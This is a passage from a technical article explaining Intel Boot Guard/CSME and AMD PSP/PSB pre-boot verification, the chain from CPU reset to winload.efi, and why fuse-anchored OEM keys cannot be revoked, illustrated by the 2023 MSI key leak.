&lt;p&gt;ME 11 ran MINIX. Earlier ME generations (ME 1 through ME 10) ran ThreadX on ARC cores. Later CSME generations from Ice Lake forward moved to a Tremont-class x86 core but kept the MINIX 3 runtime [@wiki-ime] [@wiki-ime-history].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

Thanks for putting a version of MINIX inside the ME-11 management engine chip used on almost all recent desktop and laptop computers in the world. -- Andrew S. Tanenbaum, November 2017 [@tanenbaum-letter]
&lt;p&gt;A month after Tanenbaum&apos;s letter, on December 7, 2017, Mark Ermolov and Maxim Goryachy presented &quot;How to Hack a Turned-Off Computer&quot; at Black Hat Europe 2017 [@ermolov-goryachy-2017]. The talk demonstrated unsigned-code execution in the CSME via the JTAG / Direct Connect Interface chain that became Intel security advisory INTEL-SA-00086 [@intel-sa-00086]. Intel&apos;s CSME security white paper postdates the disclosure and treats the same architecture from the vendor side [@intel-csme-whitepaper]. A year later, in 2018, Yuriy Bulygin presented &quot;A Tale of Disappearing SPI and the Intel Boot Guard Enchanted Dance&quot; at Black Hat Europe 2018 [@eclypsium-publications], the canonical reverse engineering of the Boot Guard IBB-verification flow.&lt;/p&gt;

flowchart LR
    G1[&quot;Gen 1: Trust by physical inaccessibility, pre-2011&quot;]
    G2[&quot;Gen 2: Signed BIOS update anchored in BIOS, 2011 to 2013&quot;]
    G3[&quot;Gen 3: Silicon root of trust via Boot Guard and PSP, 2013 onward&quot;]
    G4[&quot;Gen 4: Secure Boot and discrete TPM, 2012 onward&quot;]
    G5[&quot;Gen 5: fTPM on CSME and PSP, 2015 onward&quot;]
    G6[&quot;Gen 6: Microsoft Pluton, 2020 onward&quot;]
    G7[&quot;Gen 7: Open multi-signer root of trust via Caliptra, prospective&quot;]
    G1 --&amp;gt; G2 --&amp;gt; G3 --&amp;gt; G4 --&amp;gt; G5 --&amp;gt; G6 --&amp;gt; G7
&lt;p&gt;The genealogy is a chain of trades, not a chain of unambiguous improvements. Gen 2 added a revocation surface and unanchored it. Gen 3 anchored the chain in silicon and removed the revocation surface. Gen 4 (Secure Boot, parallel to Gen 3) restored revocation above the firmware layer via the &lt;code&gt;dbx&lt;/code&gt; deny-list but did not extend revocation to the fuse. Every move from one generation to the next migrated the failure surface to a different layer. The chain that ships in 2026 is the live composition of Gens 3 through 7, not a clean replacement.&lt;/p&gt;
&lt;p&gt;If the trust anchor is now a silicon fuse, what exactly does the silicon do at boot -- and why does Intel&apos;s path differ from AMD&apos;s?&lt;/p&gt;
&lt;h2&gt;3. The Two-Vendor Stack: Intel Boot Guard plus CSME, AMD PSP plus PSB&lt;/h2&gt;
&lt;p&gt;Here is a fact that surprises most x86 engineers the first time they read it carefully. On a modern AMD desktop, an ARM Cortex-A5 with TrustZone boots &lt;em&gt;before&lt;/em&gt; the x86 cores are released from reset. The x86 bootstrap processor (BSP) only comes out of reset after the on-die ARM core has verified the BIOS image in SPI flash and decided the platform is allowed to start [@wiki-amd-psp] [@amd-psb-whitepaper]. The &quot;x86 PC&quot; is, at boot, an ARM system-on-chip pretending to be an x86 PC for the first few hundred milliseconds.&lt;/p&gt;
&lt;p&gt;Intel takes the opposite architectural shape. On an Intel system the BSP comes out of reset first, but the very first instructions it executes are an Intel-signed binary called the Authenticated Code Module (ACM) which runs inside the CPU package itself, gated by microcode that verifies the ACM signature against a public-key hash that has been fused into the silicon at manufacturing time [@eclypsium-publications]. The first thing your CPU does is verify a manifest signed by Intel that tells it where the OEM&apos;s keys live.&lt;/p&gt;

A small, Intel-signed binary that the CPU loads from a known SPI region into the CPU cache as private memory and executes before any unsigned code can run. The ACM is verified against a public key whose hash is fused into the chipset Field Programmable Fuse at silicon manufacturing time. The Boot Guard ACM is the verifier that walks the OEM-signed Key Manifest and Boot Policy Manifest. The TXT SINIT ACM is a separate, later-stage ACM used by Intel TXT for dynamic root-of-trust measurement.

An array of one-time-programmable polysilicon fuses inside Intel&apos;s PCH (or, on Skylake and later, integrated into the CPU package) that the OEM blows during board manufacturing to record the hash of the OEM&apos;s Boot Guard public key, the chosen Boot Guard profile (verified-only, measured-only, or both), and the lock state. Once blown, the FPF cannot be unblown. The FPF is the bottom of the OEM-controlled portion of the Intel trust chain; below it sits the silicon-fused Intel public key that authenticates the ACM itself.

An OEM-signed manifest that tells the Boot Guard ACM which SPI regions form the Initial Boot Block, what cryptographic hash to expect over those regions, which Boot Guard profile to enforce, and (on profile 4 or 5) what to do on verification failure. The BPM is signed with the OEM Boot Policy Key, which is itself authenticated against the Key Manifest, which is itself authenticated against the FPF.

An ARM Cortex-A5 with TrustZone, integrated as a coprocessor on the AMD CPU die from Family 16h forward, that boots before the x86 cores are released from reset [@wiki-amd-psp]. The PSP runs its own boot ROM (immutable silicon), loads PSP firmware from a known SPI directory, verifies that firmware against the AMD root-key hash, and (on platforms with PSB enforced) verifies the OEM-signed BIOS image before releasing the x86 BSP from reset.

The AMD architectural feature that has the PSP measure and verify the BIOS image against an OEM-key fuse before releasing the x86 cores [@amd-psb-whitepaper]. PSB ships in two activation states: PSB-capable (PSP runs but does not enforce verification) and PSB-enforced (the OEM has burned the OEM-key hash into the PSP fuse, and the PSP will halt the platform on verification failure). PSB-enforced on EPYC is widely deployed; on Ryzen it has historically been opt-in per platform.
&lt;h3&gt;Intel: Boot Guard, CSME, and the manifest chain&lt;/h3&gt;
&lt;p&gt;Inside an Intel platform the verifier walk is precise enough to render as a list:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The Boot Guard ACM loads into a protected region of CPU cache and executes inside the CPU package.&lt;/li&gt;
&lt;li&gt;It reads the FPF for the OEM key hash and the active profile bits.&lt;/li&gt;
&lt;li&gt;It pulls the Key Manifest (KM) from SPI and verifies the KM signature against the FPF-stored hash.&lt;/li&gt;
&lt;li&gt;It pulls the Boot Policy Manifest (BPM) and verifies the BPM signature against the KM public key.&lt;/li&gt;
&lt;li&gt;It hashes the SPI regions declared by the BPM as the Initial Boot Block (IBB) and compares the hash against the BPM-declared expected value.&lt;/li&gt;
&lt;li&gt;On a match, it transfers control to the IBB and the chain proceeds.&lt;/li&gt;
&lt;li&gt;On a mismatch, it halts (profile 4 and profile 5) or extends PCR 0 with the measurement and continues (profile 3) [@eclypsium-publications].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The Bulygin BH EU 2018 reverse engineering remains the most readable primary on the actual code path [@eclypsium-publications].&lt;/p&gt;
&lt;p&gt;Separately, while the CPU is doing the Boot Guard walk, the CSME runs its own startup sequence on its own core, with its own MINIX 3 runtime [@intel-csme-whitepaper]. Once stable, it exposes three optional services [@intel-csme-whitepaper]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Intel Active Management Technology (AMT).&lt;/strong&gt; Out-of-band management; only on systems where the OEM has enabled it in firmware.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Intel Platform Trust Technology (PTT).&lt;/strong&gt; A TPM 2.0 endpoint implemented in CSME firmware, so the platform does not need a discrete TPM chip.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Intel Identity Protection Technology (IPT).&lt;/strong&gt; Hardware-rooted one-time-password generation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each service depends on CSME being trustworthy. And CSME&apos;s own runtime is verified, at boot, by the chain we have just walked.&lt;/p&gt;
&lt;h3&gt;AMD: PSP boot ROM, PSP firmware, and the OEM-key fuse&lt;/h3&gt;
&lt;p&gt;The AMD walk is structurally simpler and architecturally cleaner. The PSP boot ROM is silicon -- it cannot be modified after fabrication. It reads the PSP directory from a known SPI offset, validates the directory header, loads the PSP firmware image, and verifies that image against the AMD root-key hash that is part of the PSP boot ROM itself [@amd-psb-whitepaper]. On a PSB-enforced platform, the PSP then loads the OEM PSB key, verifies it against the OEM-key hash fused in the PSP, and uses the OEM PSB key to verify the OEM-signed BIOS image before releasing the x86 BSP from reset.&lt;/p&gt;
&lt;p&gt;The &quot;separate core boots first&quot; architectural primitive is a different kind of isolation than Intel&apos;s &quot;microcode plus signed ACM.&quot; Intel&apos;s verifier runs in the CPU package but inside a protected cache region. AMD&apos;s verifier runs on a physically separate core with its own memory map. Neither is obviously better. Both shift the trust anchor out of writable storage and into silicon.&lt;/p&gt;
&lt;p&gt;The ARM Cortex-A5 implements ARMv7-A and ships TrustZone. TrustZone partitions execution into a Non-Secure World (the Rich Execution Environment, REE) and a Secure World (the Trusted Execution Environment, TEE) with hardware-enforced isolation. The PSP runs its boot ROM and firmware in the Secure World [@wiki-amd-psp].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CSME generation&lt;/th&gt;
&lt;th&gt;Core&lt;/th&gt;
&lt;th&gt;Runtime&lt;/th&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ME 1 -- ME 10&lt;/td&gt;
&lt;td&gt;ARC&lt;/td&gt;
&lt;td&gt;ThreadX&lt;/td&gt;
&lt;td&gt;2006 -- 2014&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ME 11 (Skylake)&lt;/td&gt;
&lt;td&gt;Intel Quark x86&lt;/td&gt;
&lt;td&gt;MINIX 3&lt;/td&gt;
&lt;td&gt;2015 -- 2018&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CSME (Ice Lake+)&lt;/td&gt;
&lt;td&gt;Tremont-class x86&lt;/td&gt;
&lt;td&gt;MINIX 3&lt;/td&gt;
&lt;td&gt;2019 -- present&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Sources: [@wiki-ime] [@wiki-ime-history].&lt;/p&gt;
&lt;p&gt;The generational table for the Intel side has been the source of several recurring errors in secondary literature: claims that &quot;every CSME runs MINIX&quot; are wrong (the ARC-based ME 1 through ME 10 ran ThreadX), and claims that &quot;CSME still runs on Quark&quot; are equally wrong (Ice Lake and later moved to a Tremont-class x86 core but kept the MINIX 3 runtime) [@wiki-ime] [@wiki-ime-history].&lt;/p&gt;
&lt;p&gt;AMD has not published a complete PSP architectural document. The PSB whitepaper [@amd-psb-whitepaper] covers the PSB-flow at a marketing-architecture level; the PRO security whitepaper [@amd-pro-whitepaper] is the broadest vendor primary. Everything else about the PSP -- the runtime, the directory layout, the soft-fuses, the glitch surface -- flows through community reverse engineering. The most useful primaries are Buhren and Werling&apos;s voltage-glitching corpus at TU Berlin (now indexed via the Fraunhofer publication record) [@fraunhofer-amd], the Buhren / Jacob / Krachenfels / Seifert &quot;One Glitch to Rule Them All&quot; CCS 2021 paper [@one-glitch-2021], the Jacob / Werling / Buhren / Seifert &quot;faulTPM&quot; USENIX Security 2024 paper (arXiv v1 submitted April 28, 2023) [@faultpm-2023], the open &lt;code&gt;PSPReverse&lt;/code&gt; toolchain on GitHub [@pspreverse-org] [@psp-glitch-repo], and Matthew Garrett&apos;s 2022 reverse engineering of the PSP directory entry 0xB BIT36 &quot;soft fuse&quot; that gates Pluton on Ryzen 6000 [@garrett-pluton-2022]. The &quot;AMD has not published&quot; caveat travels with every architectural claim about the PSP in this article.&lt;/p&gt;
&lt;p&gt;The hedge matters for one specific premise: the ARM Cortex-A5 + TrustZone architectural claim is well-attested for Family 15h and Family 17h via the Buhren / Werling / Jacob / Seifert reverse-engineering corpus [@one-glitch-2021] [@faultpm-2023] [@wiki-amd-psp]. The specific core in Family 19h+ is not publicly documented. The widely-repeated &quot;Cortex-A7&quot; claim is unsupported by any vendor primary I could verify. This article uses &quot;Cortex-A5 with TrustZone&quot; only where Family 15h / 17h is in scope and says &quot;the PSP&quot; generically elsewhere.&lt;/p&gt;
&lt;p&gt;Now that we know who the verifiers are, let us watch them work -- one rung at a time -- from CPU reset to &lt;code&gt;winload.efi&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;4. The Chain Walk: From CPU Reset to winload.efi&lt;/h2&gt;
&lt;p&gt;Eleven rungs. We will walk each one in order. By the end you will know exactly what gets verified, by what, against what trust anchor, and what happens when that verification fails.&lt;/p&gt;

flowchart TD
    R[&quot;CPU reset, vector at 0xFFFFFFF0&quot;]
    subgraph IB[&quot;Intel Boot Guard&quot;]
        I1[&quot;Microcode loads ACM from SPI&quot;]
        I2[&quot;ACM verified vs silicon-fused Intel key&quot;]
        I3[&quot;ACM reads FPF: OEM key hash plus profile bits&quot;]
        I4[&quot;KM signature verified vs FPF hash&quot;]
        I5[&quot;BPM signature verified vs KM public key&quot;]
        I6[&quot;IBB regions hashed and compared to BPM&quot;]
        I7[&quot;Profile 4 or 5 halts on mismatch, Profile 3 extends PCR 0&quot;]
        I1 --&amp;gt; I2 --&amp;gt; I3 --&amp;gt; I4 --&amp;gt; I5 --&amp;gt; I6 --&amp;gt; I7
    end
    subgraph AP[&quot;AMD PSP plus PSB&quot;]
        A1[&quot;PSP boot ROM (silicon, immutable) executes&quot;]
        A2[&quot;PSP firmware loaded from SPI PSP directory&quot;]
        A3[&quot;PSP firmware verified vs AMD root key hash&quot;]
        A4[&quot;OEM PSB key loaded from SPI&quot;]
        A5[&quot;OEM PSB key verified vs OEM-key fuse&quot;]
        A6[&quot;BIOS image verified vs OEM PSB key&quot;]
        A7[&quot;x86 BSP released from reset&quot;]
        A1 --&amp;gt; A2 --&amp;gt; A3 --&amp;gt; A4 --&amp;gt; A5 --&amp;gt; A6 --&amp;gt; A7
    end
    R --&amp;gt; I1
    R --&amp;gt; A1
    I7 --&amp;gt; H[&quot;Hand-off to IBB and SEC phase&quot;]
    A7 --&amp;gt; H
&lt;h3&gt;4.1 Reset and microcode bootstrap&lt;/h3&gt;
&lt;p&gt;The x86 CPU starts executing at physical address &lt;code&gt;0xFFFFFFF0&lt;/code&gt; per the Intel SDM Volume 3A §9.1.4 (&quot;First Instruction Executed&quot;) specification [@intel-sdm-vol3a], which the chipset aliases into the SPI flash region containing the reset vector.That address is sixteen bytes below the top of 32-bit physical memory; the first instruction is typically a near jump down into the bulk of the firmware. The very first action is a microcode load: the CPU executes its built-in microcode, which then loads any microcode patches from a known SPI region. On Intel platforms the microcode patch is itself signed against an Intel public key burned into silicon. On AMD platforms the equivalent step is the PSP boot ROM execution, which happens slightly earlier in wall-clock time because the PSP starts before the x86 BSP is released [@wiki-amd-psp].&lt;/p&gt;
&lt;h3&gt;4.2 Intel ACM execution and AMD PSP first-stage boot&lt;/h3&gt;
&lt;p&gt;The Intel ACM is signed by Intel and stored in SPI. The microcode loader verifies the ACM signature against the silicon-fused Intel public key and runs the ACM inside a protected region of cache. The AMD analogue is the PSP boot ROM, which is silicon and therefore cannot be modified after fabrication. Both architectures share the invariant: the first executable code path is anchored in silicon, not flash.&lt;/p&gt;
&lt;h3&gt;4.3 FPF and OEM-fuse policy read&lt;/h3&gt;
&lt;p&gt;On Intel, the ACM reads the FPF to learn the hash of the OEM Boot Guard public key and the active Boot Guard profile. It then verifies the Key Manifest (KM) signature against the FPF hash, and the Boot Policy Manifest (BPM) signature against the KM public key. The KM and BPM together form a two-level OEM signing structure: the KM authenticates a set of permitted Boot Policy signing keys, and the BPM names the IBB regions and their expected hash.&lt;/p&gt;
&lt;p&gt;On AMD, the PSP reads the PSP directory from a known SPI offset, authenticates the directory entries against the AMD root key, and (on PSB-enforced platforms) authenticates the OEM PSB public key against the PSP-fused OEM-key hash before validating the BIOS image [@amd-psb-whitepaper].&lt;/p&gt;
&lt;h3&gt;4.4 IBB verification and SEC phase&lt;/h3&gt;

The first chunk of UEFI firmware that the lower-rung silicon verifier cryptographically covers. On Intel platforms with Boot Guard, the IBB regions are declared by the BPM and hashed by the ACM. On AMD platforms with PSB, the equivalent role is played by the PSP-verified BIOS image as a whole. The IBB is where UEFI&apos;s own code path begins.
&lt;p&gt;After IBB verification succeeds, control transfers to the IBB itself. The IBB executes the &lt;strong&gt;SEC&lt;/strong&gt; (Security) phase of the EDK II firmware lifecycle: it sets up the cache as RAM, enables initial CPU features, and prepares to hand off to PEI.&lt;/p&gt;

Intel&apos;s umbrella term, introduced with Skylake (ME 11) in 2015, for the on-die security processor that runs alongside the x86 cores and provides services to the platform: firmware TPM (PTT), AMT, identity protection, secure storage, and the runtime verifier for some pre-OS measurements [@intel-csme-whitepaper] [@wiki-ime]. CSME runs its own RTOS on its own core and is the single most complex piece of pre-OS firmware on a modern Intel platform.
&lt;h3&gt;4.5 PEI and DXE phases&lt;/h3&gt;
&lt;p&gt;The PEI (Pre-EFI Initialization) phase completes memory controller initialisation and discovers the platform&apos;s DRAM. The DXE (Driver eXecution Environment) phase then loads UEFI drivers (storage, USB, network, video, and platform-specific drivers) and brings the UEFI services online. The TianoCore EDK II reference UEFI implementation [@edk2-repo] is the canonical open-source codebase for studying PEI and DXE in detail, and every commercial vendor BIOS is structurally a fork of EDK II with proprietary platform code.&lt;/p&gt;
&lt;p&gt;&quot;SPI flash&quot; on a modern platform is not one trust domain. The main BIOS SPI region is what Boot Guard / PSB verify. But a modern PC may also have separate SPI or NVRAM regions for the Embedded Controller (keyboard, battery, lid sensor), the Thunderbolt controller, the fingerprint reader, and on servers the baseboard management controller (BMC). Each of those has its own update mechanism, its own verifier (if any), and its own attack surface. The article will revisit this in section 8.&lt;/p&gt;
&lt;h3&gt;4.6 DXE Secure Boot variable evaluation&lt;/h3&gt;
&lt;p&gt;During DXE the UEFI runtime brings the Secure Boot variable services online. The Platform Key (PK), Key Exchange Keys (KEK), Authorized Signature Database (db), and Forbidden Signature Database (dbx) are stored as UEFI authenticated variables in NVRAM, per UEFI Specification §8 [@uefi-specs]. When DXE loads a UEFI binary, the verifier compares the binary&apos;s Authenticode signature against db entries, refuses to load binaries whose hash appears in dbx, and (in the default policy) refuses to load binaries that do not match any db entry.&lt;/p&gt;
&lt;p&gt;The companion article on Secure Boot covers the PK / KEK / db / dbx model and the SBAT generation-number deny-list in detail. The point for this chain walk is that Secure Boot itself does not start until DXE has set up the UEFI variable services, and DXE itself only runs because the IBB verified by Boot Guard / PSB executed correctly.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This is rung 5 of 11. The rungs above this one -- Secure Boot policy, TPM PCR semantics, Pluton silicon enumeration, ACPI table integrity, Secured-core PC configuration -- are covered in the companion articles. The lane of this article is the rungs &lt;em&gt;below&lt;/em&gt; Secure Boot. From here forward we summarise the upper rungs only enough to show where the trust chain hands off.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;4.7 Boot Device Selection and bootmgfw.efi&lt;/h3&gt;
&lt;p&gt;After DXE completes, the BDS (Boot Device Selection) phase enumerates the boot variables stored in NVRAM, finds the first valid &lt;code&gt;EFI_LOAD_OPTION&lt;/code&gt;, and loads the EFI binary it points to. On Windows that is &lt;code&gt;\EFI\Microsoft\Boot\bootmgfw.efi&lt;/code&gt;. On Linux estates running shim it is &lt;code&gt;\EFI\&amp;lt;distro&amp;gt;\shimx64.efi&lt;/code&gt;, which is the first non-Microsoft binary the chain consents to load and which then verifies a distro-signed second-stage loader (GRUB2 in most cases) [@garrett-shim-19448].&lt;/p&gt;
&lt;h3&gt;4.8 Boot Manager verifies winload.efi; Measured Boot extends PCR 0 through 7&lt;/h3&gt;
&lt;p&gt;The Windows Boot Manager (&lt;code&gt;bootmgfw.efi&lt;/code&gt;) verifies &lt;code&gt;winload.efi&lt;/code&gt; against its built-in trust anchor, then asks &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;the TPM&lt;/a&gt; to extend a sequence of PCR measurements covering the chain it has just walked. Per the TCG PC Client Platform Firmware Profile, PCRs 0 through 7 cover (0) the platform SRTM and firmware, (1) host platform configuration, (2) UEFI drivers and option ROMs, (3) UEFI driver and application configuration, (4) the boot manager code and boot attempts, (5) boot manager configuration and the GPT, (6) host-platform-manufacturer-specific events, and (7) the Secure Boot policy [@tcg-tpm-lib]. The companion article on Measured Boot covers the PCR semantics in detail.&lt;/p&gt;
&lt;h3&gt;4.9 Hand-off to winload.efi&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;winload.efi&lt;/code&gt; loads the NT kernel, the early-launch antimalware drivers, and the Code Integrity policy. The Windows OS-side trust chain takes over from here. This article ends its lane at the hand-off.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Toy SHA-256 substitute (NOT cryptographically real -- demonstrates the extend chain only). function hashHex(s) {   let h = 2166136261;   for (const c of s) h = ((h ^ c.charCodeAt(0)) * 16777619) &amp;gt;&amp;gt;&amp;gt; 0;   return h.toString(16).padStart(8, &apos;0&apos;).repeat(8); } function extend(pcr, measurement) {   return hashHex(pcr + measurement); } const pcr0 = &apos;00&apos;.repeat(32); const afterAcm   = extend(pcr0, &apos;ACM-binary@SPI:0x10000&apos;); const afterIbb   = extend(afterAcm, &apos;IBB-region@SPI:0x100000&apos;); const afterDxe   = extend(afterIbb, &apos;DXE-driver-set-vendor-A&apos;); const afterSb    = extend(afterDxe, &apos;SecureBoot-policy:PK=hashA,KEK=hashB,db=hashC,dbx=hashD&apos;); const afterBm    = extend(afterSb, &apos;bootmgfw.efi:authenticode=hashE&apos;); const afterLoad  = extend(afterBm, &apos;winload.efi:authenticode=hashF&apos;); console.log(&apos;PCR0 after ACM    -&amp;gt;&apos;, afterAcm.slice(0, 32) + &apos;...&apos;); console.log(&apos;PCR0 after IBB    -&amp;gt;&apos;, afterIbb.slice(0, 32) + &apos;...&apos;); console.log(&apos;PCR0 after DXE    -&amp;gt;&apos;, afterDxe.slice(0, 32) + &apos;...&apos;); console.log(&apos;PCR7 after PolicyB-&amp;gt;&apos;, afterSb.slice(0, 32) + &apos;...&apos;); console.log(&apos;PCR4 after BootMgr-&amp;gt;&apos;, afterBm.slice(0, 32) + &apos;...&apos;); console.log(&apos;PCR4 after WinLoad-&amp;gt;&apos;, afterLoad.slice(0, 32) + &apos;...&apos;); console.log(); console.log(&apos;Change ANY measurement and the chain hash diverges from quote-expected value.&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Eleven rungs. Each rung&apos;s verifier inherits the trust of the rung below it. That single property -- inheritance -- is what makes the next section&apos;s argument inevitable.&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough: The Hardware Fuse as Root of Trust, and the Asymmetric Revocation Surface&lt;/h2&gt;
&lt;p&gt;The strongest layer in the chain is the layer you cannot fix. That is not a bug. It is the definition of a hardware root of trust -- and it is also why the MSI 2023 leak is permanent.&lt;/p&gt;
&lt;p&gt;The architectural insight is structural. Trust must be anchored somewhere, and the only place that survives an OS reinstall, a BIOS reflash, an SPI chip swap, and a malicious bootloader is a piece of silicon that the attacker cannot rewrite without replacing the chip. One-time-programmable polysilicon fuses give exactly that property. Burn the OEM key hash into the FPF at manufacturing time, and from that point forward only OEM-signed firmware will run on that board. The fuse is &quot;the bottom&quot; by construction.&lt;/p&gt;
&lt;p&gt;The cost is symmetric. One-time programmable means one-way trust. Once an OEM&apos;s public key hash is burned, it cannot be removed without replacing the chip. If the OEM later loses control of the corresponding private key, the public-key hash that authenticates everything signed by that private key is still in the fuse. The fuse layer has no revocation primitive.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Trust strength and revocation expressiveness move in opposite directions as you descend the pre-boot trust chain. The fuse layer is the strongest because nothing can change it -- which is exactly why nothing can revoke it. Permanence is the source of both properties, not a side effect of one.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the article&apos;s load-bearing observation, and it is worth making concrete. Going &lt;em&gt;up&lt;/em&gt; the chain from the fuse, the revocation surface gets progressively more expressive.&lt;/p&gt;

A monotonically increasing version number embedded in a signed firmware artifact (boot manager, ACM, microcode patch). When the platform&apos;s stored SVN floor is bumped, the platform refuses to load any artifact whose embedded SVN is below the floor. SVN bumps are an alternative to per-hash revocation that scales better as the number of bad artifacts grows, but they require the firmware vendor to maintain an SVN namespace and to bump it on every revocation event.

A generation-number revocation model introduced by the rhboot shim project to replace per-hash dbx revocation for shim and downstream components [@sbat-md]. Each shim, GRUB2 build, and second-stage component embeds a vendor-specific SBAT generation. When a vulnerability is found, the vendor publishes a new shim with an incremented generation. The shim verifier on the running platform refuses to load any component with a generation lower than the platform&apos;s stored floor. As the SBAT documentation notes, &quot;This single revocation event consumes 10kB of the 32kB, or roughly one third, of revocation storage typically available on UEFI platforms&quot; [@sbat-md], which is exactly the dbx exhaustion problem SBAT is designed to solve.
&lt;p&gt;At the top of the chain, on a Pluton-equipped platform, Microsoft can ship Pluton firmware updates through Windows Update [@pluton-learn]. That is the most expressive revocation surface on the chain: software cadence, OS-mediated delivery, no OEM gating on the runtime channel after initial enrolment. (The SPI-resident Pluton firmware loaded at every boot is still updated through the OEM&apos;s UEFI capsule pipeline; the OS-mediated runtime channel sits on top of it [@pluton-learn].)&lt;/p&gt;
&lt;p&gt;Below Pluton, SBAT denies entire classes of vulnerable shim binaries with one generation bump [@sbat-md]. Below SBAT, &lt;code&gt;dbx&lt;/code&gt; denies individual bootloader hashes (with the ~32 KB capacity constraint that SBAT exists to relieve). Below &lt;code&gt;dbx&lt;/code&gt;, KEK and PK are progressively more permanent because they sit at the root of UEFI&apos;s variable-authentication structure, and any change requires a Platform Key signature. Below the UEFI variables, the OEM Boot Policy Manifest is replaced only by an OEM-signed firmware update. And below the BPM, the FPF / OEM-key fuse is unrecoverable.&lt;/p&gt;

flowchart TD
    L0[&quot;Pluton firmware via Windows Update: software cadence&quot;]
    L1[&quot;SBAT generation bump: revoke an entire class with one entry&quot;]
    L2[&quot;dbx hash list: revoke per-binary, capped at roughly 32 KB&quot;]
    L3[&quot;KEK and PK: revoke only via Platform Key signature&quot;]
    L4[&quot;OEM Boot Policy Manifest: replaced by OEM-signed firmware update&quot;]
    L5[&quot;FPF / OEM-key fuse: NO REVOCATION PRIMITIVE&quot;]
    L0 --&amp;gt; L1 --&amp;gt; L2 --&amp;gt; L3 --&amp;gt; L4 --&amp;gt; L5
&lt;h3&gt;MSI 2023 as the worked example&lt;/h3&gt;
&lt;p&gt;The April 2023 MSI leak is the existence proof. The FPF on every affected Intel platform stores the SHA-256 hash of the OEM Boot Guard public key. The corresponding private key is now public. There is no operational path to revoke that hash at the fuse layer without physical chip replacement. The only &quot;revocation&quot; surfaces available to a platform owner are upper-layer compensations, and each one has a structural limit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An OS-level driver block list does not apply at boot, because the OS does not exist yet.&lt;/li&gt;
&lt;li&gt;A &lt;code&gt;dbx&lt;/code&gt; update can deny specific malicious firmware images by hash, but the attacker can sign a new image with the leaked key and rotate around the deny-list, exactly the way per-hash deny-lists always fail against an attacker who controls the signing oracle.&lt;/li&gt;
&lt;li&gt;An Intel BIOS Guard SVN bump can raise the SVN floor, but the OEM has to sign the updated firmware -- using the same Boot Guard signing infrastructure that has been compromised. The leaked key signs the SVN bump too.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Help Net Security&apos;s contemporaneous reporting captured the counts that make the impact concrete: &quot;private code signing keys for firmware images used on 57 MSI products, and private signing keys for Intel Boot Guard used on 116 MSI products ... one of the leaked keys has been detected on devices from HP, Lenovo, AOPEN, CompuLab, and Star Labs&quot; [@helpnet-msi-leak]. The Register confirmed the affected platform generations as Tiger Lake, Alder Lake, and Raptor Lake [@register-msi-alt]. Binarly&apos;s per-device catalogue lists the affected SKUs in detail [@binarly-supply-chain].&lt;/p&gt;

Every Intel chip with the leaked OEM key hash burned in is permanently downgraded to a weaker trust model -- and nothing in the layers above can recover what the fuse layer lost.
&lt;p&gt;SBAT exists for exactly the kind of revocation expressiveness the fuse layer lacks [@sbat-md]. SBAT is the negative-space comparator: this is what fuse-layer revocation could look like if it existed. It does not exist. That is the breakthrough -- and the limit -- of Gen 3 silicon roots of trust on commodity client platforms in 2026.&lt;/p&gt;
&lt;p&gt;If the fuse is unrecoverable, what does the rest of the modern stack do to compensate?&lt;/p&gt;
&lt;h2&gt;6. State of the Art: What a Modern Pre-Boot Trust Chain Looks Like in 2026&lt;/h2&gt;
&lt;p&gt;In 2026 the chain has settled into a recognisable shape on Secured-core PCs and EPYC servers. Here is what is shipping, and what each piece is for.&lt;/p&gt;
&lt;p&gt;The current best-practice configuration is roughly: Boot Guard or PSB enforced at the silicon verifier rung; BIOS Guard for runtime SPI write protection; SMM locked down via Intel TXT or AMD SKINIT; Measured Boot extending PCRs into a TPM 2.0 endpoint (discrete TPM, Intel PTT, AMD fTPM, or Microsoft Pluton); Windows DRTM enabled (extending PCR 17 through PCR 22); and the KB5025885 boot-manager revocation programme applied as it rolls out across 2025 and 2026 [@kb5025885].&lt;/p&gt;
&lt;h3&gt;KB5025885: db plus dbx plus SVN, not &quot;PK rotation&quot;&lt;/h3&gt;

A late-launch primitive (Intel TXT via the SINIT ACM, or AMD SKINIT via the SLB) that re-anchors the trust chain after the static root has done its work. DRTM allows the OS to enter a measured launch environment in which a small, trusted hypervisor or secure kernel is loaded and measured into PCRs 17 through 22, independent of the firmware boot chain. Windows DRTM uses TXT or SKINIT to bring the Secure Kernel and Hypervisor Code Integrity online with a fresh chain of measurements.
&lt;blockquote&gt;
